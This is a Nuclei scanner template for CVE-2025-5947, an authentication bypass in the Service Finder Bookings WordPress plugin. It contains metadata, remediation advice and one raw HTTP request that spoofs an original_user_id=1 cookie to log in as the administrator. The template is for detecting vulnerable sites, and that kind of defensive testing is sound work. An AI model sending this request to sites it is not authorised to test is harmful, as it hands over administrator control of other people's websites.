id: CVE-2025-5947

info:
  name: Service Finder Bookings - Authentication Bypass
  author: sedat4ras
  severity: critical
  description: |
    Service Finder Bookings WordPress plugin <= 6.0 contains a privilege escalation caused by improper validation of user cookie in service_finder_switch_back() function, letting unauthenticated attackers login as any user including admins.
  impact: |
    Unauthenticated attackers can login as any user, including administrators, leading to full system compromise.
  remediation: |
    Update to the latest version beyond 6.0.
  reference:
    - https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-bookings-plugin-6-0-authentication-bypass-via-user-switch-cookie-vulnerability
    - https://github.com/advisories/GHSA-x2xx-4qhp-2vqx
    - https://github.com/M4rgs/CVE-2025-5947_Exploit
    - https://nvd.nist.gov/vuln/detail/CVE-2025-5947
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-5947
    epss-score: 0.61701
    epss-percentile: 0.98359
    cwe-id: CWE-639
  metadata:
    max-request: 2
    vendor: sf-booking
    product: service-finder-bookings
    publicwww-query: "/wp-content/plugins/sf-booking/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,sf-booking,auth-bypass,cookie-spoofing,vuln,vkev

http:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action=service_finder_switch_back HTTP/1.1
        Host: {{Hostname}}
        Cookie: original_user_id=1

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?i)Location:.*\/wp-admin\/'

      - type: regex
        part: header
        regex:
          - '(?i)Set-Cookie:.*wordpress_logged_in_'

      - type: status
        status:
          - 301
          - 302
# digest: 4a0a00473045022100c020c1baec8530b2474a0ef632601dc9959de275e33d866d3599d601fa3cb707022037fb2b25b24c0dc0e60e4aa1c6ff77dca93926d1ee94af023ffb34229773d3a1:922c64590222798bb761d5b6d8e72950